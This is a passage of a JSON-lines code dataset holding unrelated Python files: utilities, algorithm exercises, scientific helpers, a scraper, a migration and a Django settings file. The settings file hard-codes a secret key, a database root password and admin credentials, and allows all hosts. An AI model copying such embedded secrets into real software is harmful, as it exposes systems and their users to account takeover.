{clean}\")\n","sub_path":"binary_expression_tree.py","file_name":"binary_expression_tree.py","file_ext":"py","file_size_in_byte":11160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"71848207","text":"import xlrd\nfrom xlutils.copy import copy\n\n\nclass Read_Excel(object):\n def __init__(self, file_path='E:\\LX_selenium\\config\\case.xls', index=0):\n if file_path:\n self.file_path = file_path\n self.index = index\n self.data = self.get_data()\n\n def get_data(self):\n '''获取excel数据'''\n data = xlrd.open_workbook(filename=self.file_path)\n sheet = data.sheet_by_index(sheetx=self.index)\n return sheet\n\n def get_nrows(self):\n '''获取excel数据行数'''\n if self.data.nrows >= 1:\n return self.data.nrows\n return None\n\n def get_data_list(self):\n '''获取全部行数据的列表'''\n data_list = []\n if self.get_nrows() != None:\n for i in range(self.get_nrows()):\n row_data = self.get_data().row_values(i)\n data_list.append(row_data)\n return data_list\n return None\n\n def get_cell_value(self, row, col):\n '''获取单元格数据'''\n if self.get_nrows() >= row:\n return self.data.cell_value(rowx=row, colx=col)\n return None\n\n def write_value(self, row, col, value):\n '''写入单元格数据'''\n book1 = xlrd.open_workbook(self.file_path)\n book2 = copy(book1)\n sheet_data = book2.get_sheet(0)\n sheet_data.write(row, col, value)\n book2.save(self.file_path)\n\n def get_except_value(self, data):\n '''获取预期结果值'''\n return data.split('=')\n\n\nif __name__ == '__main__':\n ex = Read_Excel('E:\\LX_selenium\\config\\key_case.xls')\n print(ex.get_nrows())\n print(ex.get_cell_value(10, 2))\n # ex.write_value(4, 0, 'pass')\n","sub_path":"util/read_excel.py","file_name":"read_excel.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"598751307","text":"import logging\nfrom logging.handlers import QueueHandler, QueueListener\nfrom queue import Queue\nimport sys\n\n\nclass Logger:\n def __init__(self):\n console_queue = Queue(-1) # no limit on size\n console_queue_handler = QueueHandler(console_queue)\n console_handler = 
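infix_to_postfix above walks through every precedence and associativity case explicitly. For reference, a condensed shunting-yard sketch over a pre-tokenized list, using the same precedence table and the same right-associative '^' convention:

from collections import deque

PREC = {'+': 0, '-': 0, '*': 1, '/': 1, '^': 2}
RIGHT_ASSOC = {'^'}

def to_postfix(tokens):
    # Compact shunting-yard: operands pass through, operators wait on a
    # stack until a lower-precedence operator or '(' is on top.
    out, ops = [], deque()
    for tok in tokens:
        if tok == '(':
            ops.appendleft(tok)
        elif tok == ')':
            while ops[0] != '(':
                out.append(ops.popleft())
            ops.popleft()  # discard the '('
        elif tok in PREC:
            while (ops and ops[0] != '(' and
                   (PREC[ops[0]] > PREC[tok] or
                    (PREC[ops[0]] == PREC[tok] and tok not in RIGHT_ASSOC))):
                out.append(ops.popleft())
            ops.appendleft(tok)
        else:
            out.append(tok)  # operand
    out.extend(ops)  # drain remaining operators, top of stack first
    return out

print(to_postfix(['(', '2', '+', '5', ')', '/', '3']))  # ['2', '5', '+', '3', '/']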
logging.StreamHandler(sys.stdout)\n console_handler.setLevel(logging.CRITICAL)\n console_handler.setFormatter(logging.Formatter('%(levelname)s:\\t%(message)s'))\n self.console_listener = QueueListener(console_queue, console_handler, respect_handler_level=True)\n\n file_queue = Queue(-1) # no limit on size\n file_queue_handler = QueueHandler(file_queue)\n file_handler = logging.FileHandler(\"results.csv\", \"w\", \"utf-8\")\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(logging.Formatter('%(message)s'))\n self.file_listener = QueueListener(file_queue, file_handler, respect_handler_level=True)\n\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.DEBUG)\n self.logger.addHandler(console_queue_handler)\n self.logger.addHandler(file_queue_handler)\n\n def start(self):\n self.console_listener.start()\n self.file_listener.start()\n\n def stop(self):\n self.console_listener.stop()\n self.file_listener.stop()\n\n def info(self, msg):\n self.logger.info(msg)\n\n def debug(self, msg):\n self.logger.debug(msg)\n\n def critical(self, msg):\n self.logger.critical(msg)\n","sub_path":"logger_old.py","file_name":"logger_old.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"623408344","text":"\ndef f_x(x):\n ret=x**4 -3*x**3+2\n return ret\n\ndef f_prime_x(x):\n ret=4*x**3-9*x**2\n return ret\n\ndef gradient_descent():\n x_old=0.0\n x_new=6.0\n precission=0.00001\n max_iter=1000\n # learning_rate=0.01\n learning_rate=0.0001\n# learning_rate=0.1\n iter=0\n\n while abs(x_new-x_old)>precission and iter triage_k + 1:\n if location_feature:\n th = (1 - triage_percent/2)*100\n\n # get distance to nearest neighbors\n tree = cKDTree(scores_channel[:, :2])\n dist, ind = tree.query(scores_channel[:, :2], k=triage_k + 1)\n dist = np.sum(dist, 1)\n # triage far ones\n idx_triage[idx_data[dist > np.percentile(dist, th)]] = 1\n\n # get distance to nearest neighbors\n tree = cKDTree(scores_channel[:, 2:])\n dist, ind = tree.query(scores_channel[:, 2:], k=triage_k + 1)\n dist = np.sum(dist, 1)\n # triage far ones\n idx_triage[idx_data[dist > np.percentile(dist, th)]] = 1\n\n else:\n # get distance to nearest neighbors\n tree = cKDTree(scores_channel)\n dist, ind = tree.query(scores_channel, k=triage_k + 1)\n dist = np.sum(dist, 1)\n\n # triage far ones\n idx_triage[idx_data[dist > np.percentile(dist, th)]] = 1\n\n idx_triage = np.where(idx_triage)[0]\n scores = np.delete(scores, idx_triage, 0)\n spike_index = np.delete(spike_index, idx_triage, 0)\n\n return scores, spike_index\n","sub_path":"src/yass/cluster/triage.py","file_name":"triage.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"371952675","text":"class Solution:\n def maxProduct(self, nums: List[int]) -> int:\n res = imin = imax = nums[0]\n for num in nums[1:]:\n if num < 0:\n imin, imax = imax, imin\n imin = min(imin * num, num)\n imax = max(imax * num, num)\n res = max(res, imax)\n return res\n","sub_path":"152.py","file_name":"152.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"616807124","text":"# 5185 / convert binary from hecadecimal\nfor T in range(int(input())):\n N, bit = input().split()\n\n print(f'#{T + 1}', end=' ')\n for i in range(int(N)):\n if bit[i] in '0123456789':\n digit = ord(bit[i]) - ord('0')\n else:\n digit = 
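The gradient-descent record above loses its loop body to truncation, so the update and stopping rule in this sketch are the conventional ones rather than recovered text; it minimizes the same f(x) = x**4 - 3*x**3 + 2:

def f_prime(x):
    # Derivative of f(x) = x**4 - 3*x**3 + 2, matching the snippet above.
    return 4 * x ** 3 - 9 * x ** 2

def gradient_descent(x0=6.0, learning_rate=1e-4, precision=1e-5, max_iter=100000):
    # Assumed standard update: step downhill until successive iterates
    # differ by less than `precision` or the iteration budget runs out.
    x_old, x_new, it = x0 + 2 * precision, x0, 0
    while abs(x_new - x_old) > precision and it < max_iter:
        x_old = x_new
        x_new = x_old - learning_rate * f_prime(x_old)
        it += 1
    return x_new

print(gradient_descent())  # converges toward the local minimum near x = 2.25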
ord(bit[i]) - ord('A') + 10\n\n for j in range(3, -1, -1):\n if not digit & (1 << j):\n print('0', end='')\n else:\n print('1', end='')\n print()\n","sub_path":"Course/Advanced/5185.py","file_name":"5185.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"178599440","text":"import sqlite3\nimport csv\nimport codecs\nimport db_util\nimport json\nimport time\nimport logger\n\nclass ChineseWriter:\n \"\"\"\n A CSV writer which will write (Chinese) rows to CSV file \"f\", \n which is encoded in utf-8.\n \"\"\"\n\n def __init__(self, f, dialect=csv.excel, encoding=\"utf-8\", **kwds):\n # Redirect output to a queue\n f.write(codecs.BOM_UTF8)\n self.writer = csv.writer(f, dialect=dialect, **kwds)\n\n def writerow(self, row):\n self.writer.writerow([unicode(s).encode(\"utf-8\") for s in row])\n\n def writerows(self, rows):\n for row in rows:\n self.writerow(row)\n\ndef table_to_csv(db, sql, out='weibos.csv', headers=None):\n\trows = db_util.execute(db, sql)\n\trows = pre_process(rows)\n\twriter = ChineseWriter(open(out, \"wb\"))\n\tif headers is not None:\n\t\twriter.writerow(headers)\n\twriter.writerows(rows)\n\ndef pre_process(rows):\n\tde_jsonfied_rows = []\n\tpic = headers.index('pic_infos')\n\tretweet = headers.index('retweeted_status')\n\tfor row in rows:\n\t\ttemp = [json.loads(item) if isinstance(item, unicode) else item for item in row]\n\t\ttemp = [item.replace('\\n', '\\\\n') if isinstance(item, unicode) else item for item in temp]\n\t\tif temp[pic] != '':\n\t\t\tpic_infos = temp[pic]\n\t\t\tpics = [pic_infos[ind]['largest']['url'] for ind in pic_infos]\n\t\t\tpics = ','.join(pics)\n\t\t\ttemp[pic] = pics\n\t\tif temp[retweet] != '':\n\t\t\tretweeted_text = temp[retweet]['text']\n\t\t\ttemp[retweet] = retweeted_text\n\t\tde_jsonfied_rows.append(temp)\n\treturn de_jsonfied_rows\n\n#def byteify(input):\n# if isinstance(input, dict):\n# return {byteify(key): byteify(value)\n# for key, value in input.iteritems()}\n# elif isinstance(input, list):\n# return [byteify(element) for element in input]\n# elif isinstance(input, unicode):\n# return input.encode('utf-8')\n# else:\n# return input\n\n\nheaders = ['uid', 'mid', 'reposts_count', 'comments_count', 'attitudes_count', 'text', 'retweeted_status', 'pic_infos', 'source', 'created_at', 'created_time', 'geo', 'deleted']\n\ndef last_deleted_weibos_to_csv(db, uid, del_time=None, out='weibos.csv'):\n\tif del_time is None:\n\t\tsql = 'select distinct deleted from status where uid=%s order by deleted desc limit 1' % uid\n\t\tdel_time = db_util.execute(db, sql)[0]\n\tsql = ''\n\tfor header in headers:\n\t\tsql += header\n\t\tsql += ', '\n\tsql = sql[:-2]\n\tsql = 'SELECT ' + sql + ' FROM status WHERE deleted=%d ORDER BY created_time' % (del_time)\n\ttable_to_csv(db, sql, out, headers)\n\ndef all_weibos_to_csv(db, uid, out='weibos.csv'):\n\tsql = ''\n\tfor header in headers:\n\t\tsql += header\n\t\tsql += ', '\n\tsql = sql[:-2]\n\tsql = 'SELECT ' + sql + ' FROM status WHERE uid=%s ORDER BY created_time' % uid\n\ttable_to_csv(db, sql, out, headers)\n\ndef export_all(config):\n\tdb = config['db']\n\tfor entry in config['tasks']:\n\t\tuid = entry['uid']\n\t\tuname = entry['name']\n\t\tout = uname + '_all_' + time.strftime(\"%Y-%m-%d\") + '.csv'\n\t\tall_weibos_to_csv(db, uid, out)\n\t\tlogger.log('[x] Export %s\\'s weibo to %s' % (uid, out), 'green')\n\ndef test():\n\tall_weibos_to_csv('t7.db', '3675868752', 'FXD_test.csv')\n\nif __name__ == 
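The digit extraction above combines ord() arithmetic with per-bit masking; int(ch, 16) plus a zero-padded binary format string yields the same 4-bit expansion per hexadecimal digit:

def hex_char_to_bits(ch):
    # Same conversion the loop above performs with ord() and bit masks:
    # parse one hex digit, then render it as exactly four binary digits.
    return format(int(ch, 16), '04b')

print(''.join(hex_char_to_bits(c) for c in 'D9'))  # 11011001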
\"__main__\":\n\ttest()","sub_path":"util/weibo_writer.py","file_name":"weibo_writer.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69171023","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nfrom typing import Optional, Sequence\n\nimport oneflow as flow\nfrom oneflow.framework.tensor import register_tensor_op\n\n\n@register_tensor_op(\"permute\")\ndef permute_op(input, *dims):\n \"\"\"Returns a view of the original tensor with its dimensions permuted.\n\n Args:\n *dims (int...): The desired ordering of dimensions\n\n For example:\n\n .. code-block:: python\n\n >>> import numpy as np\n >>> import oneflow as flow\n \n >>> input = flow.tensor(np.random.randn(2, 6, 5, 3), dtype=flow.float32)\n >>> out = input.permute(1, 0, 2, 3).shape\n >>> out\n oneflow.Size([6, 2, 5, 3])\n\n \"\"\"\n\n perm = list(dims)\n assert len(perm) == len(input.shape)\n new_perm = []\n for dim in perm:\n if dim < 0:\n dim += len(perm)\n assert dim >= 0 and dim < len(\n input.shape\n ), \"Invalid dim0 {}, len(shape): {}\".format(dim, len(input.shape))\n new_perm.append(dim)\n return flow._C.transpose(input, perm=new_perm)\n\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod(raise_on_error=True)\n","sub_path":"python/oneflow/nn/modules/permute.py","file_name":"permute.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"654037036","text":"from __future__ import division, print_function, absolute_import\n \nimport numpy as np\nimport pandas as pd\nimport cooler\nimport h5py\nimport logging\n \nlogger = logging.getLogger(__name__)\n \nTILE_SIZE = 256\n\n\ndef abs_coord_2_bin(c, abs_pos, chroms, chrom_cum_lengths, chrom_sizes):\n \"\"\"Get bin ID from absolute coordinates.\n \n Args:\n c (Cooler): Cooler instance of a .cool file.\n abs_pos (int): Absolute coordinate to be translated.\n \n Returns:\n int: Bin number.\n \"\"\"\n \n try:\n chr_id = np.flatnonzero(chrom_cum_lengths > abs_pos)[0] - 1\n except IndexError:\n return c.info['nbins']\n \n chrom = chroms[chr_id]\n rel_pos = abs_pos - chrom_cum_lengths[chr_id]\n \n return c.offset((chrom, rel_pos, chrom_sizes[chrom]))\n\n\ndef get_chromosome_names_cumul_lengths(c):\n '''\n Get the chromosome names and cumulative lengths:\n \n Args:\n \n c (Cooler): A cooler file\n \n Return:\n \n (names, sizes, lengths) -> (list(string), dict, np.array(int))\n '''\n chrom_names = c.chromnames\n chrom_sizes = dict(c.chromsizes)\n chrom_cum_lengths = np.r_[0, np.cumsum(c.chromsizes.values)]\n return chrom_names, chrom_sizes, chrom_cum_lengths\n \n \ndef get_data(f, start_pos_1, end_pos_1, start_pos_2, end_pos_2, transform='default'):\n \"\"\"Get balanced pixel data.\n \n Args:\n f: h5py.File\n An HDF5 Group that contains the cooler for this resolution\n start_pos_1 (int): Test.\n end_pos_1 (int): Test.\n 
start_pos_2 (int): Test.\n end_pos_2 (int): Test.\n \n Returns:\n DataFrame: Annotated cooler pixels.\n \"\"\"\n \n c = cooler.Cooler(f)\n \n (chroms, chrom_sizes, chrom_cum_lengths) = get_chromosome_names_cumul_lengths(c)\n \n i0 = abs_coord_2_bin(c, start_pos_1, chroms, chrom_cum_lengths, chrom_sizes)\n i1 = abs_coord_2_bin(c, end_pos_1, chroms, chrom_cum_lengths, chrom_sizes)\n\n j0 = abs_coord_2_bin(c, start_pos_2, chroms, chrom_cum_lengths, chrom_sizes)\n j1 = abs_coord_2_bin(c, end_pos_2, chroms, chrom_cum_lengths, chrom_sizes)\n\n '''\n print('i', i0, i1)\n print('j', j0, j1)\n '''\n matrix = c.matrix(as_pixels=True, balance=False, max_chunk=np.inf)\n\n if i0 >= matrix.shape[0] or j0 >= matrix.shape[1]:\n # query beyond the bounds of the matrix\n # return an empty matrix\n i0,i1,i1,j1 = 0,0,0,0\n else:\n # limit the range of the query to be within bounds\n i1 = min(i1, matrix.shape[0]-1)\n j1 = min(j1, matrix.shape[1]-1)\n\n #print(\"size\", matrix.shape)\n\n pixels = matrix[i0:i1+1, j0:j1+1]\n\n if not len(pixels):\n return pd.DataFrame(columns=['genome_start1', 'genome_start2', 'balanced'])\n \n # select bin columns to extract\n cols = ['chrom', 'start', 'end']\n if (transform == 'default' and 'weight' in c.bins()) or transform == 'weight':\n cols.append('weight')\n elif transform in ('KR', 'VC', 'VC_SQRT'):\n cols.append(transform)\n\n bins = c.bins(convert_enum=False)[cols] \n pixels = cooler.annotate(pixels, bins)\n pixels['genome_start1'] = chrom_cum_lengths[pixels['chrom1']] + pixels['start1']\n pixels['genome_start2'] = chrom_cum_lengths[pixels['chrom2']] + pixels['start2']\n\n # apply transform\n if (transform == 'default' and 'weight' in c.bins()) or transform == 'weight':\n pixels['balanced'] = (\n pixels['count'] * pixels['weight1'] * pixels['weight2']\n )\n return pixels[['genome_start1', 'genome_start2', 'balanced']]\n elif transform in ('KR', 'VC', 'VC_SQRT'):\n pixels['balanced'] = (\n pixels['count'] / pixels[transform+'1'] / pixels[transform+'2']\n )\n return pixels[['genome_start1', 'genome_start2', 'balanced']]\n else:\n return pixels[['genome_start1', 'genome_start2', 'count']]\n\n \ndef get_info(file_path):\n \"\"\"Get information of a cooler file.\n \n Args:\n file_path (str): Path to a cooler file.\n \n Returns:\n dict: Dictionary containing basic information about the cooler file.\n \"\"\"\n \n with h5py.File(file_path, 'r') as f:\n max_zoom = f.attrs.get('max-zoom')\n \n if max_zoom is None:\n logger.info('no zoom found')\n raise ValueError(\n 'The `max_zoom` attribute is missing.'\n )\n \n c = cooler.Cooler(f[\"0\"])\n \n (chroms, chrom_sizes, chrom_cum_lengths) = get_chromosome_names_cumul_lengths(c)\n \n total_length = int(chrom_cum_lengths[-1])\n max_zoom = f.attrs['max-zoom']\n bin_size = int(f[str(max_zoom)].attrs['bin-size'])\n \n max_width = bin_size * TILE_SIZE * 2**max_zoom\n \n # the list of available data transforms\n transforms = {}\n \n for i in range(max_zoom):\n f_for_zoom = f[str(i)]['bins']\n\n if 'weight' in f_for_zoom:\n transforms['weight'] = {'name': 'ICE', 'value': 'weight'}\n if 'KR' in f_for_zoom:\n transforms['KR'] = {'name': 'KR', 'value': 'KR'}\n if 'VC' in f_for_zoom:\n transforms['VC'] = {'name': 'VC', 'value': 'VC'}\n if 'VC_SQRT' in f_for_zoom:\n transforms['VC_SQRT'] = {'name': 'VC_SQRT', 'value': 'VC_SQRT'}\n\n info = {\n 'min_pos': [0.0, 0.0],\n 'max_pos': [total_length, total_length],\n 'max_zoom': max_zoom,\n 'max_width': max_width,\n 'bins_per_dimension': TILE_SIZE,\n 'transforms': transforms.values()\n }\n \n return 
info\n\n\ndef get_quadtree_depth(chromsizes, binsize):\n \"\"\"\n Depth of quad tree necessary to tesselate the concatenated genome with quad\n tiles such that linear dimension of the tiles is a preset multiple of the \n genomic resolution.\n\n \"\"\"\n tile_size_bp = TILE_SIZE * binsize\n min_tile_cover = np.ceil(sum(chromsizes) / tile_size_bp)\n return int(np.ceil(np.log2(min_tile_cover)))\n\n\ndef get_zoom_resolutions(chromsizes, base_res):\n return [base_res * 2**x for x in range(get_quadtree_depth(chromsizes, base_res)+1)]\n\n\ndef print_zoom_resolutions(chromsizes_file, base_res):\n \"\"\"\n Print comma-separated list of zoom resolutions for a given genome\n and base resolution.\n\n \"\"\"\n chromsizes = cooler.util.read_chromsizes(chromsizes_file, all_names=True)\n resolutions = get_zoom_resolutions(chromsizes, base_res)\n print(','.join(str(res) for res in resolutions))\n","sub_path":"cooler/contrib/higlass.py","file_name":"higlass.py","file_ext":"py","file_size_in_byte":6424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"84230187","text":"from operator import attrgetter\n\nfrom typing import (\n Iterator,\n List,\n Dict\n)\n\nfrom core.methods import Method\nfrom core.models import Token\n\n\ndef build_groups(\n normalized_tokens: List[Token],\n method: Method,\n convergence: float\n) -> Dict[str, Token]:\n groups = dict()\n\n while len(normalized_tokens) > 0:\n group_key = normalized_tokens.pop(0)\n group_variants = [group_key]\n\n for i in range(len(normalized_tokens) - 1, -1, -1):\n score = method.score(\n w1=normalized_tokens[i].term,\n w2=group_key.term\n )\n\n if score >= convergence:\n group_token = normalized_tokens.pop(i)\n group_token.convergence = score\n\n group_variants.append(group_token)\n\n group_value = sum((x.value for x in group_variants))\n group_value = group_value / float(len(group_variants))\n\n groups[group_key.term] = Token(\n term=group_key.term,\n value=group_value\n )\n\n return groups\n\n\ndef where(\n tokens: Iterator[Token],\n attribute: str,\n operator: str,\n criterion: float,\n orderby: str,\n reverse: bool = True,\n) -> List[Token]:\n if operator not in ['ge', 'gt', 'le', 'lt', 'eq', 'ne']:\n raise ValueError('Operator not found')\n\n operator = '__{operator}__'.format(\n operator=operator\n )\n\n generator = (\n token for token in tokens\n if getattr(getattr(token, attribute), operator)(criterion)\n )\n\n return sorted(generator, key=attrgetter(orderby), reverse=reverse)\n\n\ndef normalize(tokens: Iterator[Token]) -> Iterator[Token]:\n max_score = max((token.value for token in tokens))\n\n for token in tokens:\n yield Token(\n term=token.term,\n value=token.value / max_score\n )\n","sub_path":"STG/core/terms.py","file_name":"terms.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"92148651","text":"#Алгоритм Евклида\r\n#1.Большее число делим на меньшее\r\n#2.Если делится без остатка, то меньшее число и есть НОД\r\n#3.Если есть остаток, то большее число заменяем на остаток от деления\r\n#4.Переходим к пункту 1.\r\na = 8\r\nb = 8\r\n \r\nwhile a!=0 and b!=0:\r\n if a > b:\r\n a = a % b\r\n else:\r\n b = b % a\r\n \r\nprint (a+b)","sub_path":"evklid 2.py","file_name":"evklid 2.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"399007113","text":"\"\"\"Create Link\n\nRevision ID: 
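The short GCD snippet above is commented in Russian (Euclid's algorithm: divide the larger number by the smaller; if there is no remainder, the smaller number is the GCD, otherwise replace the larger number with the remainder and repeat). An English-commented version of the same loop, wrapped as a function:

# Euclid's algorithm, English rendering of the Russian comments above:
# 1. Divide the larger number by the smaller.
# 2. If there is no remainder, the smaller number is the GCD.
# 3. Otherwise, replace the larger number with the remainder.
# 4. Repeat from step 1.
def gcd(a, b):
    while a != 0 and b != 0:
        if a > b:
            a %= b
        else:
            b %= a
    return a + b  # one operand is 0 here, so this returns the other

print(gcd(8, 8))   # 8
print(gcd(12, 8))  # 4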
979da018b72b\nRevises: 99e314ce223a\nCreate Date: 2017-03-22 10:22:16.855758\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '979da018b72b'\ndown_revision = '99e314ce223a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('links',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('url', sa.String(length=512), nullable=False),\n sa.Column('spring', sa.String(length=6), nullable=False),\n sa.Column('created', sa.DateTime(), nullable=True),\n sa.Column('clicked', sa.Integer(), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('owner_id', 'url', name='owner_url_uni'),\n sa.UniqueConstraint('spring')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('links')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/979da018b72b_create_link.py","file_name":"979da018b72b_create_link.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"271525629","text":"import requests\nimport parsel\nfor page in range(1,6):\n print('==========正在爬取第{}页数据============='.format(page))\n base_url = \"http://www.win4000.com/sjzt/keai_{}.html\".format(page)\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36 Edg/80.0.361.109'}\n\n\n response = requests.get(base_url,headers=headers)\n date = response.text\n\n html_date = parsel.Selector(date)\n\n data_list = html_date.xpath('//div[@class=\"Left_bar\"]//ul/li/a/@href').extract()\n # print(data_list)\n for alist in data_list:\n response2 = requests.get(alist,headers=headers).text\n #提取图片的url地址\n html_2 = parsel.Selector(response2)#转换数据类型\n img_url = html_2.xpath('//div[@class=\"pic-meinv\"]/a/img/@src').extract_first() #只提取一个数据\n # print(img_url)\n #请求图片数据\n img_date = requests.get(img_url,headers=headers).content #提取二进制数据 使用content方法\n\n #保存数据\n #1、准备文件名\n file_name = img_url.split('/')[-1]\n with open('img\\\\'+file_name,mode='wb') as f:\n print('正在保存文件',file_name)\n f.write(img_date)\n","sub_path":"office_automatiion/抓取可爱壁纸.py","file_name":"抓取可爱壁纸.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"59307478","text":"# -*- coding:utf-8 -*-\n\"\"\"\nDjango settings for shuishui project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(__file__)\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '+^h^odqy2v)dp7uczj*d+!_810%7j=709(^$_rtdux89l85ul0'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\nIS_ONLINE = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nSHUISHUI_APPS = (\n 
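The wallpaper scraper above chains requests with parsel selectors: build a Selector from page text, xpath out detail-page links, then drill into each one. The selector half of that flow in an offline sketch (the HTML string here is a made-up stand-in for the real page):

import parsel

html = '<div class="Left_bar"><ul><li><a href="https://example.com/p/1">x</a></li></ul></div>'
sel = parsel.Selector(text=html)
# Same xpath shape the scraper uses to collect detail-page links.
links = sel.xpath('//div[@class="Left_bar"]//ul/li/a/@href').extract()
print(links)  # ['https://example.com/p/1']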
'sns',\n 'base'\n)\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n) + SHUISHUI_APPS\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'base.middleware.elapsedtime.ElapsedTime',\n)\n\nROOT_URLCONF = 'urls'\n\nWSGI_APPLICATION = 'wsgi.application'\n\n# 后台账号密码为 liuzongrun 111111\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'shuishui',\n 'USER': 'root',\n 'PASSWORD': 'bigbossliu',\n 'HOST': '',\n 'PORT': '',\n 'OPTIONS': {'charset': 'utf8mb4'},\n 'ATOMIC_REQUESTS': True,\n },\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'zh-hans'\n\nTIME_ZONE = 'Asia/Shanghai'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nSTATIC_URL = '/static/'\n# python manage.py collectstatic 命令会将各个app的static的复制到这里\nSTATIC_ROOT = BASE_DIR + \"/static/\"\n\nLOGS_BASE_DIR = os.path.join(BASE_DIR, \"log\")\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(filename)s %(funcName)s [line:%(lineno)d] %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n\n 'handlers': {\n 'null': {\n 'level': 'DEBUG',\n 'class': 'django.utils.log.NullHandler',\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n 'mail_admins': {\n 'level': 'ERROR',\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n\n # 默认的log,当程序内直接调用logging时,log内容会写入log/default.log\n 'default': {\n 'level': 'INFO',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'default.log'),\n 'formatter': 'verbose',\n },\n ## 默认的服务器ERROR log\n 'default_err': {\n 'level': 'ERROR',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'error_logger.log'),\n 'formatter': 'verbose',\n },\n ## 存放每一个请求的信息\n 'elapsed_logger': {\n 'level': 'INFO',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'elapsed_logger.log'),\n 'formatter': 'verbose',\n },\n ## 调用logging_exception时存异常入这个文件\n 'exception_logger': {\n 'level': 'INFO',\n 'class': 'logging.handlers.WatchedFileHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'exception_logger.log'),\n 'formatter': 'verbose',\n },\n ## 这里借助logging的FileHandler获取error信息\n 'error_handler': {\n 'level': 'INFO',\n 'class': 'code.error_handler.ErrorHandler',\n 'filename': os.path.join(LOGS_BASE_DIR, 'fuck.log'),\n 